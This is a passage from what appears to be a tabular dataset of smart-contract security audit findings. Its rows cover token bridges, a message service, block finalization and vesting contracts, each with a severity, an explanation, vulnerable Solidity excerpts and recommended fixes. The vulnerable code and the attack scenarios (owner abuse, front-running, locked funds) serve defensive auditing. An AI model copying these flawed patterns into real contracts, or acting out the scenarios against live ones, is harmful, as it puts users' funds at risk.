DuplicateValidatorKey(bytes);\\nerror FundedValidatorDeletionAttempt();\\nerror OperatorLimitTooHigh(uint256 limit, uint256 keyCount);\\nerror MaximumOperatorCountAlreadyReached();\\nerror LastEditAfterSnapshot();\\nerror PublicKeyNotInContract();\\n```\\n\\nFor instance, the `init` modifier is used to initialize the contracts with the current Version. The Version initialization ensures that the provided version must be an increment of the previous version, if not, it reverts with an error as `AlreadyInitialized()`. However, the error doesn't convey an appropriate message correctly, as any version other than the expected version will signify that the version has already been initialized.\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != VERSION\\_SLOT.getUint256() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\n\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != VERSION\\_SLOT.getUint256() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\n\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != StakingContractStorageLib.getVersion() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\n","Use a more meaningful statement with enough information to track off-chain for all the custom errors in every contract in scope. For instance, add the current and supplied versions as indexed parameters, like: IncorrectVersionInitialization(current version, supplied version);\\nAlso, the function can be simplified as\\n```\\n function initELD(address \\_stakingContract) external init(VERSION\\_SLOT.getUint256() + 1) {\\n STAKING\\_CONTRACT\\_ADDRESS\\_SLOT.setAddress(\\_stakingContract);\\n }\\n```\\n",,"```\\nerror Forbidden();\\nerror InvalidFee();\\nerror Deactivated();\\nerror NoOperators();\\nerror InvalidCall();\\nerror Unauthorized();\\nerror DepositFailure();\\nerror DepositsStopped();\\nerror InvalidArgument();\\nerror UnsortedIndexes();\\nerror InvalidPublicKeys();\\nerror InvalidSignatures();\\nerror InvalidWithdrawer();\\nerror InvalidZeroAddress();\\nerror AlreadyInitialized();\\nerror InvalidDepositValue();\\nerror NotEnoughValidators();\\nerror InvalidValidatorCount();\\nerror DuplicateValidatorKey(bytes);\\nerror FundedValidatorDeletionAttempt();\\nerror OperatorLimitTooHigh(uint256 limit, uint256 keyCount);\\nerror MaximumOperatorCountAlreadyReached();\\nerror LastEditAfterSnapshot();\\nerror PublicKeyNotInContract();\\n```\\n" +Architectural Pattern of Internal and External Functions Increases Attack Surface,low,"There is an architectural pattern throughout the code of functions being defined in two places: an external wrapper (name) that verifies authorization and validates parameters, and an internal function (_name) that contains the implementation logic. This pattern separates concerns and avoids redundancy in the case that more than one external function reuses the same internal logic.\\nFor example, `VotingTokenLockupPlans.setupVoting` calls an internal function `_setupVoting` and sets the `holder` parameter to `msg.sender`.\\n```\\nfunction setupVoting(uint256 planId) external nonReentrant returns (address votingVault) {\\n votingVault = \\_setupVoting(msg.sender, planId);\\n```\\n\\n```\\nfunction \\_setupVoting(address holder, uint256 planId) internal returns (address) {\\n require(ownerOf(planId) == holder, '!owner');\\n```\\n\\nIn this case, however, there is no case in which `holder` should not be set to `msg.sender`. Because the internal function doesn't enforce this, it's theoretically possible that if another internal (or derived) function were compromised then it could call `_setupVoting` with `holder` set to `ownerOf(planId)`, even if `msg.sender` isn't the owner. This increases the attack surface through providing unneeded flexibility.\\nOther Examples\\n```\\nfunction segmentPlan(\\n uint256 planId,\\n uint256[] memory segmentAmounts\\n) external nonReentrant returns (uint256[] memory newPlanIds) {\\n newPlanIds = new uint256[](segmentAmounts.length);\\n for (uint256 i; i < segmentAmounts.length; i++) {\\n uint256 newPlanId = \\_segmentPlan(msg.sender, planId, segmentAmounts[i]);\\n```\\n\\n```\\nfunction \\_segmentPlan(address holder, uint256 planId, uint256 segmentAmount) internal returns (uint256 newPlanId) {\\n require(ownerOf(planId) == holder, '!owner');\\n```\\n\\n```\\nfunction revokePlans(uint256[] memory planIds) external nonReentrant {\\n for (uint256 i; i < planIds.length; i++) {\\n \\_revokePlan(msg.sender, planIds[i]);\\n```\\n\\n```\\nfunction \\_revokePlan(address vestingAdmin, uint256 planId) internal {\\n Plan memory plan = plans[planId];\\n require(vestingAdmin == plan.vestingAdmin, '!vestingAdmin');\\n```\\n","Resolution\\nFixed as of commit `f4299cdba5e863c9ca2d69a3a7dd554ac34af292`.\\nTo reduce the attack surface, consider hard coding parameters such as `holder` to `msg.sender` in internal functions when extra flexibility isn't needed.",,"```\\nfunction setupVoting(uint256 planId) external nonReentrant returns (address votingVault) {\\n votingVault = \\_setupVoting(msg.sender, planId);\\n```\\n" +Revoking Vesting Will Trigger a Taxable Event,low,"Resolution\\nFixed as of commit `f4299cdba5e863c9ca2d69a3a7dd554ac34af292`.\\nFrom the previous conversations with the Hedgey team, we identified that users should be in control of when taxable events happen. For that reason, one could redeem a plan in the past. Unfortunately, the recipient of the vesting plan can not always be in control of the redemption process. If for one reason or another the administrator of the vesting plan decides to revoke it, any vested funds will be sent to the vesting plan holder, triggering the taxable event and burning the NFT.\\n```\\nfunction \\_revokePlan(address vestingAdmin, uint256 planId) internal {\\n Plan memory plan = plans[planId];\\n require(vestingAdmin == plan.vestingAdmin, '!vestingAdmin');\\n (uint256 balance, uint256 remainder, ) = planBalanceOf(planId, block.timestamp, block.timestamp);\\n require(remainder > 0, '!Remainder');\\n address holder = ownerOf(planId);\\n delete plans[planId];\\n \\_burn(planId);\\n TransferHelper.withdrawTokens(plan.token, vestingAdmin, remainder);\\n TransferHelper.withdrawTokens(plan.token, holder, balance);\\n emit PlanRevoked(planId, balance, remainder);\\n}\\n```\\n\\n```\\nfunction \\_revokePlan(address vestingAdmin, uint256 planId) internal {\\n Plan memory plan = plans[planId];\\n require(vestingAdmin == plan.vestingAdmin, '!vestingAdmin');\\n (uint256 balance, uint256 remainder, ) = planBalanceOf(planId, block.timestamp, block.timestamp);\\n require(remainder > 0, '!Remainder');\\n address holder = ownerOf(planId);\\n delete plans[planId];\\n \\_burn(planId);\\n address vault = votingVaults[planId];\\n if (vault == address(0)) {\\n TransferHelper.withdrawTokens(plan.token, vestingAdmin, remainder);\\n TransferHelper.withdrawTokens(plan.token, holder, balance);\\n } else {\\n delete votingVaults[planId];\\n VotingVault(vault).withdrawTokens(vestingAdmin, remainder);\\n VotingVault(vault).withdrawTokens(holder, balance);\\n }\\n emit PlanRevoked(planId, balance, remainder);\\n}\\n```\\n",One potential workaround is to only withdraw the unvested portion to the vesting admin while keeping the vested part in the contract. That being said `amount` and `rate` variables would need to be updated in order not to allow any additional vesting for the given plan. This way plan holders will not be entitled to more funds but will be able to redeem them at the time they choose.,,"```\\nfunction \\_revokePlan(address vestingAdmin, uint256 planId) internal {\\n Plan memory plan = plans[planId];\\n require(vestingAdmin == plan.vestingAdmin, '!vestingAdmin');\\n (uint256 balance, uint256 remainder, ) = planBalanceOf(planId, block.timestamp, block.timestamp);\\n require(remainder > 0, '!Remainder');\\n address holder = ownerOf(planId);\\n delete plans[planId];\\n \\_burn(planId);\\n TransferHelper.withdrawTokens(plan.token, vestingAdmin, remainder);\\n TransferHelper.withdrawTokens(plan.token, holder, balance);\\n emit PlanRevoked(planId, balance, remainder);\\n}\\n```\\n" +Use of selfdestruct Deprecated in VotingVault,low,"The `VotingVault.withdrawTokens` function invokes the `selfdestruct` operation when the vault is empty so that it can't be used again.\\nThe use ofselfdestruct has been deprecated and a breaking change in its future behavior is expected.\\n```\\nfunction withdrawTokens(address to, uint256 amount) external onlyController {\\n TransferHelper.withdrawTokens(token, to, amount);\\n if (IERC20(token).balanceOf(address(this)) == 0) selfdestruct;\\n}\\n```\\n",Remove the line that invokes `selfdestruct` and consider changing internal state so that future calls to `delegateTokens` always revert.,,"```\\nfunction withdrawTokens(address to, uint256 amount) external onlyController {\\n TransferHelper.withdrawTokens(token, to, amount);\\n if (IERC20(token).balanceOf(address(this)) == 0) selfdestruct;\\n}\\n```\\n" +Balance of msg.sender Is Used Instead of the from Address,low,"The `TransferHelper` library has methods that allow transferring tokens directly or on behalf of a different wallet that previously approved the transfer. Those functions also check the sender balance before conducting the transfer. In the second case, where the transfer happens on behalf of someone the code is checking not the actual token spender balance, but the `msg.sender` balance instead.\\n```\\nfunction transferTokens(\\n address token,\\n address from,\\n address to,\\n uint256 amount\\n) internal {\\n uint256 priorBalance = IERC20(token).balanceOf(address(to));\\n require(IERC20(token).balanceOf(msg.sender) >= amount, 'THL01');\\n```\\n",Use the `from` parameter instead of `msg.sender`.,,"```\\nfunction transferTokens(\\n address token,\\n address from,\\n address to,\\n uint256 amount\\n) internal {\\n uint256 priorBalance = IERC20(token).balanceOf(address(to));\\n require(IERC20(token).balanceOf(msg.sender) >= amount, 'THL01');\\n```\\n" +Bridge Token Would Be Locked and Cannot Bridge to Native Token,high,"If the bridge token B of a native token A is already deployed and `confirmDeployment` is called on the other layer and `setDeployed` sets A's `nativeToBridgedToken` value to `DEPLOYED_STATUS`. The bridge token B cannot bridge to native token A in `completeBridging` function, because A's `nativeToBridgedToken` value is not `NATIVE_STATUS`, as a result the native token won't be transferred to the receiver. User's bridge token will be locked in the original layer\\n```\\nif (nativeMappingValue == NATIVE\\_STATUS) {\\n // Token is native on the local chain\\n IERC20(\\_nativeToken).safeTransfer(\\_recipient, \\_amount);\\n} else {\\n bridgedToken = nativeMappingValue;\\n if (nativeMappingValue == EMPTY) {\\n // New token\\n bridgedToken = deployBridgedToken(\\_nativeToken, \\_tokenMetadata);\\n bridgedToNativeToken[bridgedToken] = \\_nativeToken;\\n nativeToBridgedToken[\\_nativeToken] = bridgedToken;\\n }\\n BridgedToken(bridgedToken).mint(\\_recipient, \\_amount);\\n}\\n```\\n\\n```\\nfunction setDeployed(address[] memory \\_nativeTokens) external onlyMessagingService fromRemoteTokenBridge {\\n address nativeToken;\\n for (uint256 i; i < \\_nativeTokens.length; i++) {\\n nativeToken = \\_nativeTokens[i];\\n nativeToBridgedToken[\\_nativeTokens[i]] = DEPLOYED\\_STATUS;\\n emit TokenDeployed(\\_nativeTokens[i]);\\n }\\n}\\n```\\n","Add an condition `nativeMappingValue` = `DEPLOYED_STATUS` for native token transfer in `confirmDeployment`\\n```\\nif (nativeMappingValue == NATIVE_STATUS || nativeMappingValue == DEPLOYED_STATUS) {\\n IERC20(_nativeToken).safeTransfer(_recipient, _amount);\\n```\\n",,"```\\nif (nativeMappingValue == NATIVE\\_STATUS) {\\n // Token is native on the local chain\\n IERC20(\\_nativeToken).safeTransfer(\\_recipient, \\_amount);\\n} else {\\n bridgedToken = nativeMappingValue;\\n if (nativeMappingValue == EMPTY) {\\n // New token\\n bridgedToken = deployBridgedToken(\\_nativeToken, \\_tokenMetadata);\\n bridgedToNativeToken[bridgedToken] = \\_nativeToken;\\n nativeToBridgedToken[\\_nativeToken] = bridgedToken;\\n }\\n BridgedToken(bridgedToken).mint(\\_recipient, \\_amount);\\n}\\n```\\n" +User Cannot Withdraw Funds if Bridging Failed or Delayed Won't Fix,high,"If the bridging failed due to the single coordinator is down, censoring the message, or bridge token contract is set to a bad or wrong contract address by `setCustomContract`, user's funds will stuck in the `TokenBridge` contract until coordinator is online or stop censoring, there is no way to withdraw the deposited funds\\n```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, \\_targetContract);\\n}\\n```\\n","Add withdraw functionality to let user withdraw the funds under above circumstances or at least add withdraw functionality for Admin (admin can send the funds to the user manually), ultimately decentralize coordinator and sequencer to reduce bridging failure risk.",,"```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, \\_targetContract);\\n}\\n```\\n" +"Bridges Don't Support Multiple Native Tokens, Which May Lead to Incorrect Bridging",high,"Currently, the system design does not support the scenarios where native tokens with the same addresses (which is possible with the same deployer and nonce) on different layers can be bridged.\\nFor instance, Let's consider, there is a native token `A` on `L1` which has already been bridged on `L2`. If anyone tries to bridge native token `B` on `L2` with the same address as token `A` , instead of creating a new bridge on `L1` and minting new tokens, the token bridge will transfer native token `A` on `L1` to the `_recipient` which is incorrect.\\nThe reason is the mappings don't differentiate between the native tokens on two different Layers.\\n```\\n mapping(address => address) public nativeToBridgedToken;\\n mapping(address => address) public bridgedToNativeToken;\\n```\\n\\n```\\nfunction completeBridging(\\n address \\_nativeToken,\\n uint256 \\_amount,\\n address \\_recipient,\\n bytes calldata \\_tokenMetadata\\n) external onlyMessagingService fromRemoteTokenBridge {\\n address nativeMappingValue = nativeToBridgedToken[\\_nativeToken];\\n address bridgedToken;\\n\\n if (nativeMappingValue == NATIVE\\_STATUS) {\\n // Token is native on the local chain\\n IERC20(\\_nativeToken).safeTransfer(\\_recipient, \\_amount);\\n } else {\\n```\\n",Redesign the approach to handle the same native tokens on different layers. One possible approach could be to define the set of mappings for each layer.,,```\\n mapping(address => address) public nativeToBridgedToken;\\n mapping(address => address) public bridgedToNativeToken;\\n```\\n +No Check for Initializing Parameters of TokenBridge,high,"In `TokenBridge` contract's `initialize` function, there is no check for initializing parameters including `_securityCouncil`, `_messageService`, `_tokenBeacon` and `_reservedTokens`. If any of these address is set to 0 or other invalid value, `TokenBridge` would not work, user may lose funds.\\n```\\nfunction initialize(\\n address \\_securityCouncil,\\n address \\_messageService,\\n address \\_tokenBeacon,\\n address[] calldata \\_reservedTokens\\n) external initializer {\\n \\_\\_Pausable\\_init();\\n \\_\\_Ownable\\_init();\\n setMessageService(\\_messageService);\\n tokenBeacon = \\_tokenBeacon;\\n for (uint256 i = 0; i < \\_reservedTokens.length; i++) {\\n setReserved(\\_reservedTokens[i]);\\n }\\n \\_transferOwnership(\\_securityCouncil);\\n}\\n```\\n","Add non-zero address check for `_securityCouncil`, `_messageService`, `_tokenBeacon` and `_reservedTokens`",,"```\\nfunction initialize(\\n address \\_securityCouncil,\\n address \\_messageService,\\n address \\_tokenBeacon,\\n address[] calldata \\_reservedTokens\\n) external initializer {\\n \\_\\_Pausable\\_init();\\n \\_\\_Ownable\\_init();\\n setMessageService(\\_messageService);\\n tokenBeacon = \\_tokenBeacon;\\n for (uint256 i = 0; i < \\_reservedTokens.length; i++) {\\n setReserved(\\_reservedTokens[i]);\\n }\\n \\_transferOwnership(\\_securityCouncil);\\n}\\n```\\n" +Owner Can Update Arbitrary Status for New Native Token Without Confirmation,high,"The function `setCustomContract` allows the owner to update arbitrary status for new native tokens without confirmation, bypassing the bridge protocol.\\nIt can set `DEPLOYED_STATUS` for a new native token, even if there exists no bridged token for it.\\nIt can set `NATIVE_STATUS` for a new native token even if it's not.\\nIt can set `RESERVED_STATUS` disallowing any new native token to be bridged.\\n```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, \\_targetContract);\\n}\\n```\\n",The function should not allow `_targetContract` to be any state code,,"```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, \\_targetContract);\\n}\\n```\\n" +Owner May Exploit Bridged Tokens,high,"The function `setCustomContract` allows the owner, to define a custom ERC20 contract for the native token. However, it doesn't check whether the target contract has already been defined as a bridge to a native token or not. As a result, the owner may take advantage of the design flaw and bridge another new native token that has not been bridged yet, to an already existing target(already a bridge for another native token). Now, if a user tries to bridge this native token, the token bridge on the source chain will take the user's tokens, and instead of deploying a new bridge on the destination chain, tokens will be minted to the `_recipient` on an existing bridge defined by the owner, or it can be any random EOA address to create a DoS.\\nThe owner can also try to front-run calls to `completeBridging` for new Native Tokens on the destination chain, by setting a different bridge via `setCustomContract`. Although, the team states that the role will be controlled by a multi-sig which makes frontrunning less likely to happen.\\n```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, \\_targetContract);\\n}\\n```\\n\\n```\\n} else {\\n bridgedToken = nativeMappingValue;\\n if (nativeMappingValue == EMPTY) {\\n // New token\\n bridgedToken = deployBridgedToken(\\_nativeToken, \\_tokenMetadata);\\n bridgedToNativeToken[bridgedToken] = \\_nativeToken;\\n nativeToBridgedToken[\\_nativeToken] = bridgedToken;\\n }\\n BridgedToken(bridgedToken).mint(\\_recipient, \\_amount);\\n}\\n```\\n","Make sure, a native token should bridge to a single target contract. A possible approach could be to check whether the `bridgedToNativeToken` for a target is `EMPTY` or not. If it's not `EMPTY`, it means it's already a bridge for a native token and the function should revert. The same can be achieved by adding the modifier `isNewToken(_targetContract)`.\\nNote:- However, it doesn't resolve the issue of frontrunning, even if the likelihood is less.",,"```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, \\_targetContract);\\n}\\n```\\n" +Updating Message Service Does Not Emit Event,medium,"Resolution\\nThe recommendations are implemented by the Linea team in the pull request 69 with the final commit hash as `1fdd5cfc51c421ad9aaf8b2fd2b3e2ed86ffa898`\\nThe function `setMessageService` allows the owner to update the message service address. However, it does not emit any event reflecting the change. As a result, in case the owner gets compromised, it can silently add a malicious message service, exploiting users' funds. Since, there was no event emitted, off-chain monitoring tools wouldn't be able to trigger alarms and users would continue using rogue message service until and unless tracked manually.\\n```\\nfunction setMessageService(address \\_messageService) public onlyOwner {\\n messageService = IMessageService(\\_messageService);\\n}\\n```\\n",Consider emitting an event reflecting the update from the old message service to the new one.,,```\\nfunction setMessageService(address \\_messageService) public onlyOwner {\\n messageService = IMessageService(\\_messageService);\\n}\\n```\\n +Lock Solidity Version in pragma,low,"Contracts should be deployed with the same compiler version they have been tested with. Locking the pragma helps ensure that contracts do not accidentally get deployed using, for example, the latest compiler which may have higher risks of undiscovered bugs. Contracts may also be deployed by others and the pragma indicates the compiler version intended by the original authors.\\nSee Locking Pragmas in Ethereum Smart Contract Best Practices.\\n```\\npragma solidity ^0.8.19;\\n```\\n\\n```\\npragma solidity ^0.8.19;\\n```\\n\\n```\\npragma solidity ^0.8.19;\\n```\\n\\n```\\npragma solidity ^0.8.19;\\n```\\n",Lock the Solidity version to the latest version before deploying the contracts to production.\\n```\\npragma solidity 0.8.19;\\n```\\n,,```\\npragma solidity ^0.8.19;\\n```\\n +TokenBridge Does Not Follow a 2-Step Approach for Ownership Transfers,low,"Resolution\\nThe recommendations are implemented by the Linea team in the pull request 71 with the final commit hash as `8ebfd011675ea318b7067af52637192aa1126acd`\\n`TokenBridge` defines a privileged role Owner, however, it uses a single-step approach, which immediately transfers the ownership to the new address. If accidentally passed an incorrect address, the current owner will immediately lose control over the system as there is no fail-safe mechanism.\\nA safer approach would be to first propose the ownership to the new owner, and let the new owner accept the proposal to be the new owner. It will add a fail-safe mechanism for the current owner as in case it proposes ownership to an incorrect address, it will not immediately lose control, and may still propose again to a correct address.\\n```\\ncontract TokenBridge is ITokenBridge, PausableUpgradeable, OwnableUpgradeable {\\n```\\n",Consider moving to a 2-step approach for the ownership transfers as recommended above. Note:- Openzeppelin provides another helper utility as Ownable2StepUpgradeable which follows the recommended approach,,"```\\ncontract TokenBridge is ITokenBridge, PausableUpgradeable, OwnableUpgradeable {\\n```\\n" +"Heavy Blocks May Affect Block Finalization, if the Gas Requirement Exceeds Block Gas Limit",high,"The `sequencer` takes care of finalizing blocks by submitting proof, blocks' data, proof type, and parent state root hash. The team mentions that the blocks are finalized every 12s, and under general scenarios, the system will work fine. However, in cases where there are blocks containing lots of transactions and event logs, the function may require gas more than the block gas limit. As a consequence, it may affect block finalization or lead to a potential DoS.\\n```\\nfunction finalizeBlocks(\\n BlockData[] calldata \\_blocksData,\\n bytes calldata \\_proof,\\n uint256 \\_proofType,\\n bytes32 \\_parentStateRootHash\\n)\\n```\\n",We advise the team to benchmark the cost associated per block for the finalization and how many blocks can be finalized in one rollup and add the limits accordingly for the prover/sequencer.,,"```\\nfunction finalizeBlocks(\\n BlockData[] calldata \\_blocksData,\\n bytes calldata \\_proof,\\n uint256 \\_proofType,\\n bytes32 \\_parentStateRootHash\\n)\\n```\\n" +Postman Can Incorrectly Deliver a Message While Still Collecting the Fees,high,"The message service allows cross chain message delivery, where the user can define the parameters of the message as:\\nfrom: Sender of the message _to: Receiver of the message _fee: The fees, the sender wants to pay to the postman to deliver the message valueSent: The value in the native currency of the chain to be sent with the message messageNumber: Nonce value which increments for every message _calldata: Calldata for the message to be executed on the destination chain\\nThe postman estimates the gas before claiming/delivering the message on the destination chain, thus avoiding scenarios where the fees sent are less than the cost of claiming the message.\\nHowever, there is nothing that restricts the postman from sending the gas equal to the fees paid by the user. Although it contributes to the MEV, where the postman can select the messages with higher fees first and deliver them prior to others, it also opens up an opportunity where the postman can deliver a message incorrectly while still claiming the fees.\\nOne such scenario is, where the low-level call to target `_to` makes another sub-call to another address, let's say `x`. Let's assume, the `_to` address doesn't check, whether the call to address `x` was successful or not. Now, if the postman supplies a gas, which makes the top-level call succeed, but the low-level call to `x` fails silently, the postman will still be retrieving the fees of claiming the message, even though the message was not correctly delivered.\\n```\\n(bool success, bytes memory returnData) = \\_to.call{ value: \\_value }(\\_calldata);\\nif (!success) {\\n if (returnData.length > 0) {\\n assembly {\\n let data\\_size := mload(returnData)\\n revert(add(32, returnData), data\\_size)\\n }\\n } else {\\n revert MessageSendingFailed(\\_to);\\n }\\n}\\n```\\n\\n```\\n(bool success, bytes memory returnData) = \\_to.call{ value: \\_value }(\\_calldata);\\nif (!success) {\\n if (returnData.length > 0) {\\n assembly {\\n let data\\_size := mload(returnData)\\n revert(add(32, returnData), data\\_size)\\n }\\n } else {\\n revert MessageSendingFailed(\\_to);\\n }\\n}\\n```\\n","Another parameter can be added to the message construct giving the user the option to define the amount of gas required to complete a transaction entirely. Also, a check can be added while claiming the message, to make sure the gas supplied by the postman is sufficient enough compared to the gas defined/demanded by the user. The cases, where the user can demand a huge amount of gas, can be simply avoided by doing the gas estimation, and if the demanded gas is more than the supplied fees, the postman will simply opt not to deliver the message",,"```\\n(bool success, bytes memory returnData) = \\_to.call{ value: \\_value }(\\_calldata);\\nif (!success) {\\n if (returnData.length > 0) {\\n assembly {\\n let data\\_size := mload(returnData)\\n revert(add(32, returnData), data\\_size)\\n }\\n } else {\\n revert MessageSendingFailed(\\_to);\\n }\\n}\\n```\\n" +User's Funds Would Stuck if the Message Claim Failed on the Destination Layer,high,"When claiming the message on the destination layer, if the message failed to execute with various reasons (e.g. wrong target contract address, wrong contract logic, out of gas, malicious contract), the Ether sent with `sendMessage` on the original layer will be stuck, although the message can be retried later by the Postman or the user (could fail again)\\n```\\nuint256 messageNumber = nextMessageNumber;\\nuint256 valueSent = msg.value - \\_fee;\\n\\nbytes32 messageHash = keccak256(abi.encode(msg.sender, \\_to, \\_fee, valueSent, messageNumber, \\_calldata));\\n```\\n\\n```\\n(bool success, bytes memory returnData) = \\_to.call{ value: \\_value }(\\_calldata);\\nif (!success) {\\n if (returnData.length > 0) {\\n assembly {\\n let data\\_size := mload(returnData)\\n revert(add(32, returnData), data\\_size)\\n }\\n } else {\\n revert MessageSendingFailed(\\_to);\\n }\\n}\\n```\\n\\n```\\n(bool success, bytes memory returnData) = \\_to.call{ value: \\_value }(\\_calldata);\\nif (!success) {\\n if (returnData.length > 0) {\\n assembly {\\n let data\\_size := mload(returnData)\\n revert(add(32, returnData), data\\_size)\\n }\\n } else {\\n revert MessageSendingFailed(\\_to);\\n }\\n}\\n```\\n",Add refund mechanism to refund users funds if the message failed to deliver on the destination layer,,"```\\nuint256 messageNumber = nextMessageNumber;\\nuint256 valueSent = msg.value - \\_fee;\\n\\nbytes32 messageHash = keccak256(abi.encode(msg.sender, \\_to, \\_fee, valueSent, messageNumber, \\_calldata));\\n```\\n" +Front Running finalizeBlocks When Sequencers Are Decentralized,high,"When sequencer is decentralized in the future, one sequencer could front run another sequencer's `finalizeBlocks` transaction, without doing the actual proving and sequencing, and steal the reward for sequencing if there is one. Once the frontrunner's `finalizeBlocks` is executed, the original sequencer's transaction would fail as `currentL2BlockNumber` would increment by one and state root hash won't match, as a result the original sequencer's sequencing and proving work will be wasted.\\n```\\nfunction finalizeBlocks(\\n BlockData[] calldata \\_blocksData,\\n bytes calldata \\_proof,\\n uint256 \\_proofType,\\n bytes32 \\_parentStateRootHash\\n)\\n external\\n whenTypeNotPaused(PROVING\\_SYSTEM\\_PAUSE\\_TYPE)\\n whenTypeNotPaused(GENERAL\\_PAUSE\\_TYPE)\\n onlyRole(OPERATOR\\_ROLE)\\n{\\n if (stateRootHashes[currentL2BlockNumber] != \\_parentStateRootHash) {\\n revert StartingRootHashDoesNotMatch();\\n }\\n\\n \\_finalizeBlocks(\\_blocksData, \\_proof, \\_proofType, \\_parentStateRootHash, true);\\n}\\n```\\n","Add the sequencer's address as one parameters in `_finalizeBlocks` function, and include the sequencer's address in the public input hash of the proof in verification function `_verifyProof`.\\n```\\nfunction _finalizeBlocks(\\n BlockData[] calldata _blocksData,\\n bytes memory _proof,\\n uint256 _proofType,\\n bytes32 _parentStateRootHash,\\n bool _shouldProve,\\n address _sequencer\\n )\\n```\\n\\n```\\n_verifyProof(\\n uint256(\\n keccak256(\\n abi.encode(\\n keccak256(abi.encodePacked(blockHashes)),\\n firstBlockNumber,\\n keccak256(abi.encodePacked(timestampHashes)),\\n keccak256(abi.encodePacked(hashOfRootHashes)),\\n keccak256(abi.encodePacked(_sequencer)\\n )\\n )\\n ) % MODULO_R,\\n _proofType,\\n _proof,\\n _parentStateRootHash\\n );\\n```\\n",,"```\\nfunction finalizeBlocks(\\n BlockData[] calldata \\_blocksData,\\n bytes calldata \\_proof,\\n uint256 \\_proofType,\\n bytes32 \\_parentStateRootHash\\n)\\n external\\n whenTypeNotPaused(PROVING\\_SYSTEM\\_PAUSE\\_TYPE)\\n whenTypeNotPaused(GENERAL\\_PAUSE\\_TYPE)\\n onlyRole(OPERATOR\\_ROLE)\\n{\\n if (stateRootHashes[currentL2BlockNumber] != \\_parentStateRootHash) {\\n revert StartingRootHashDoesNotMatch();\\n }\\n\\n \\_finalizeBlocks(\\_blocksData, \\_proof, \\_proofType, \\_parentStateRootHash, true);\\n}\\n```\\n" +User Funds Would Stuck if the Single Coordinator Is Offline or Censoring Messages,high,"When user sends message from L1 to L2, the coordinator needs to post the messages to L2, this happens in the anchoring message(addL1L2MessageHashes) on L2, then the user or Postman can claim the message on L2. since there is only a single coordinator, if the coordinator is down or censoring messages sent from L1 to L2, users funds can stuck in L1, until the coordinator come back online or stops censoring the message, as there is no message cancel feature or message expire feature. Although the operator can pause message sending on L1 once the coordinator is down, but if the message is sent and not posted to L2 before the pause it will still stuck.\\n```\\nuint256 messageNumber = nextMessageNumber;\\nuint256 valueSent = msg.value - \\_fee;\\n\\nbytes32 messageHash = keccak256(abi.encode(msg.sender, \\_to, \\_fee, valueSent, messageNumber, \\_calldata));\\n```\\n\\n```\\nfunction addL1L2MessageHashes(bytes32[] calldata \\_messageHashes) external onlyRole(L1\\_L2\\_MESSAGE\\_SETTER\\_ROLE) {\\n uint256 messageHashesLength = \\_messageHashes.length;\\n\\n if (messageHashesLength > 100) {\\n revert MessageHashesListLengthHigherThanOneHundred(messageHashesLength);\\n }\\n\\n for (uint256 i; i < messageHashesLength; ) {\\n bytes32 messageHash = \\_messageHashes[i];\\n if (inboxL1L2MessageStatus[messageHash] == INBOX\\_STATUS\\_UNKNOWN) {\\n inboxL1L2MessageStatus[messageHash] = INBOX\\_STATUS\\_RECEIVED;\\n }\\n unchecked {\\n i++;\\n }\\n }\\n\\n emit L1L2MessageHashesAddedToInbox(\\_messageHashes);\\n}\\n```\\n",Decentralize coordinator and sequencer or enable user cancel or drop the message if message deadline has expired.,,"```\\nuint256 messageNumber = nextMessageNumber;\\nuint256 valueSent = msg.value - \\_fee;\\n\\nbytes32 messageHash = keccak256(abi.encode(msg.sender, \\_to, \\_fee, valueSent, messageNumber, \\_calldata));\\n```\\n" +Changing Verifier Address Doesn't Emit Event,high,"In function `setVerifierAddress`, after the verifier address is changed, there is no event emitted, which means if the operator (security council) changes the verifier to a buggy verifier, or if the security council is compromised, the attacker can change the verifier to a malicious one, the unsuspecting user would still use the service, potentially lose funds due to the fraud transactions would be verified.\\n```\\nfunction setVerifierAddress(address \\_newVerifierAddress, uint256 \\_proofType) external onlyRole(DEFAULT\\_ADMIN\\_ROLE) {\\n if (\\_newVerifierAddress == address(0)) {\\n revert ZeroAddressNotAllowed();\\n }\\n verifiers[\\_proofType] = \\_newVerifierAddress;\\n}\\n```\\n","Emits event after changing verifier address including old verifier address, new verifier address and the caller account",,"```\\nfunction setVerifierAddress(address \\_newVerifierAddress, uint256 \\_proofType) external onlyRole(DEFAULT\\_ADMIN\\_ROLE) {\\n if (\\_newVerifierAddress == address(0)) {\\n revert ZeroAddressNotAllowed();\\n }\\n verifiers[\\_proofType] = \\_newVerifierAddress;\\n}\\n```\\n" +L2 Blocks With Incorrect Timestamp Could Be Finalized,medium,"In `_finalizeBlocks` of `ZkEvmV2`, the current block 